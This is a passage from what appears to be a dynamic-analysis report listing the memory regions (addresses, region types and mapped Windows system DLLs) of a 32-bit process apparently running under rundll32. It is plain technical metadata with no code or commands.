start_va = 0x6ff50000 end_va = 0x6ff9ffff monitored = 0 entry_point = 0x6ff68180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1198 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1199 start_va = 0x6ff40000 end_va = 0x6ff47fff monitored = 0 entry_point = 0x6ff417c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1201 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1202 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1203 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1204 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1205 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1206 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1207 start_va = 0x500000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1208 start_va = 0x74610000 end_va = 0x746a1fff monitored = 0 entry_point = 0x74650380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1209 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1210 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1211 start_va = 0x6e3c0000 end_va = 0x6e637fff monitored = 0 entry_point = 0x6e3d5e90 region_type = mapped_file name = "aclayers.dll" filename = "\\Windows\\AppPatch\\AcLayers.dll" (normalized: "c:\\windows\\apppatch\\aclayers.dll") Region: id = 1212 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1213 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1214 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1215 start_va = 0x75bf0000 end_va = 0x76feefff monitored = 0 entry_point = 0x75dab990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1216 start_va = 0x74b20000 end_va = 0x74b56fff monitored = 0 entry_point = 0x74b23b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1217 start_va = 0x75600000 end_va = 0x75af8fff monitored = 0 entry_point = 0x75807610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1218 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1219 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1220 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1221 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1222 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1223 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1224 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1225 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1226 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1227 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1228 start_va = 0x773b0000 end_va = 0x773f3fff monitored = 0 entry_point = 0x773b7410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1229 start_va = 0x74fe0000 end_va = 0x74feefff monitored = 0 entry_point = 0x74fe2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1230 start_va = 0x77870000 end_va = 0x77901fff monitored = 0 entry_point = 0x778a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1231 start_va = 0x77460000 end_va = 0x7786afff monitored = 0 entry_point = 0x7748adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 1232 start_va = 0x702c0000 end_va = 0x702d5fff monitored = 0 entry_point = 0x702c21d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1233 start_va = 0x66680000 end_va = 0x66682fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\SysWOW64\\sfc.dll" (normalized: "c:\\windows\\syswow64\\sfc.dll") Region: id = 1234 start_va = 0x70250000 end_va = 0x702b6fff monitored = 0 entry_point = 0x70265a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 1235 start_va = 0x74360000 end_va = 0x7437afff monitored = 0 entry_point = 0x74369050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1236 start_va = 0x70240000 end_va = 0x7024efff monitored = 0 entry_point = 0x702463e0 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\SysWOW64\\sfc_os.dll" (normalized: "c:\\windows\\syswow64\\sfc_os.dll") Region: id = 1237 start_va = 0x140000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1238 start_va = 0x170000 end_va = 0x199fff monitored = 0 entry_point = 0x175680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1239 start_va = 0x600000 end_va = 0x787fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1240 start_va = 0x75450000 end_va = 0x7547afff monitored = 0 entry_point = 0x75455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1241 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1242 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1243 start_va = 0x150000 end_va = 0x15ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1244 start_va = 0x170000 end_va = 0x170fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\rundll32.exe.mui") Region: id = 1245 start_va = 0x4860000 end_va = 0x49e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 1246 start_va = 0x49f0000 end_va = 0x5deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 1247 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1248 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1249 start_va = 0x5df0000 end_va = 0x5ed9fff monitored = 0 entry_point = 0x5e2d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1250 start_va = 0x77240000 end_va = 0x7725afff monitored = 0 entry_point = 0x772473e0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\SysWOW64\\imagehlp.dll" (normalized: "c:\\windows\\syswow64\\imagehlp.dll") Region: id = 1251 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1252 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1253 start_va = 0x5df0000 end_va = 0x5f77fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename = "" Region: id = 1254 start_va = 0x5f80000 end_va = 0x60fcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 1255 start_va = 0x6100000 end_va = 0x63f9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1256 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1257 start_va = 0x5df0000 end_va = 0x5eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005df0000" filename = "" Region: id = 1258 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1259 start_va = 0x790000 end_va = 0x82bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1361 start_va = 0x5ef0000 end_va = 0x5f18fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ef0000" filename = "" Region: id = 1362 start_va = 0x5f20000 end_va = 0x5f48fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f20000" filename = "" Region: id = 1363 start_va = 0x5f50000 end_va = 0x5fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f50000" filename = "" Region: id = 1364 start_va = 0x5fe0000 end_va = 0x606ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005fe0000" filename = "" Region: id = 1365 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1366 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1367 start_va = 0x6400000 end_va = 0x7f57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006400000" filename = "" Region: id = 1368 start_va = 0x7f60000 end_va = 0x8154fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f60000" filename = "" Region: id = 1369 start_va = 0x8160000 end_va = 0x8354fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008160000" filename = "" Region: id = 1370 start_va = 0x6070000 end_va = 0x60affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006070000" filename = "" Region: id = 1371 start_va = 0x60b0000 end_va = 0x60effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 1372 start_va = 0x8360000 end_va = 0x838cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008360000" filename = "" Region: id = 1373 start_va = 0x716e0000 end_va = 0x718ecfff monitored = 0 entry_point = 0x717cacb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1379 start_va = 0x8390000 end_va = 0x8470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008390000" filename = "" Region: id = 1395 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1396 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1400 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1401 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1402 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1403 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1404 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1405 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1406 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1407 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1408 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1409 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1410 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1411 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1412 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1413 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1414 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1415 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1416 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1417 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1418 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1419 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1420 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1421 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1422 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1423 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1424 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1425 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1426 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1427 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1428 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1429 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1430 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1431 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1432 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1433 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1434 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1435 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1436 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1437 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1438 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1439 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1440 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1441 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1442 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1443 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1444 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1445 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1446 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1447 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1448 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1449 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1450 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1451 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1452 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1453 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1454 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1455 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1456 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1457 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1458 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1459 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1460 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1461 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1462 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1463 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1464 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1465 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1466 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1467 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1468 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1469 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1470 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1471 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1472 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1473 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1474 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1475 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1476 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1477 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1478 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1479 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1480 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1481 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1482 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1483 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1484 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1485 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1486 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1487 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1488 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1489 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1490 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1491 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1492 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1493 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1494 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1495 start_va = 0x1e0000 end_va = 0x1fffff monitored = 1 entry_point = 